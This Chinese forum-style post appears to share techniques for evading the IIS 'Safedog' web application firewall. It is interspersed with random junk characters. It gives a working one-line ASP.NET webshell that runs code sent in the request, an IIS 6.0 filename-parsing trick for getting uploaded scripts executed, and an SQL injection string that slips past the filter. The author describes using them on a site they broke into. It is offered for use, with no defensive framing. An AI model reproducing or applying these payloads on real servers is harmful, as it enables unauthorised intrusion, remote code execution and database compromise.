1、绕过IIS安全狗的一句话。
* i; ~$ F- }" X/ r0 ~5 x! r前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
6 t6 \2 S8 c: ], ~# z- f<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
9 W% I# p- Q( |( z1 P: X! D4 a' P, r
: f. S' d& s( @# T2、IIS6.0解析漏洞遇到安全狗。5 ]; m0 U4 R" u: F2 a, m8 ?5 \1 }
文件名为) W( }5 }( x& x1 ~4 Y
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
1 Q) ]% a0 A$ V3 }
; T% y, O5 g' {% R! A这样的会被IIS安全狗果断屏蔽。
. j8 b+ r+ I5 c/ Y) e改成如下名称,IIS6一样会解析:
' F; ~4 v0 B9 Q/ {6 K5 Dwww.xxxxx.com/;1.asp;1.jpg7 l* R. N7 v8 F, }9 G3 a" \! t
/ v2 I8 V! Q2 o$ k, }3、安全狗的注入绕过。
% I* V+ N4 o8 F5 v6 j T常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。% h4 ^% J; d* L& M( F
但如果:8 Z: z+ M* t) C- S8 C9 v
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
( S! x+ n/ ^ `就可以成功绕过了。0 o/ _0 N! W% i2 A4 k; i- M
. d( W! S" O+ T5 ^' ] W/ a2 v ?+ _$ P2 z* }: R o( O5 T
|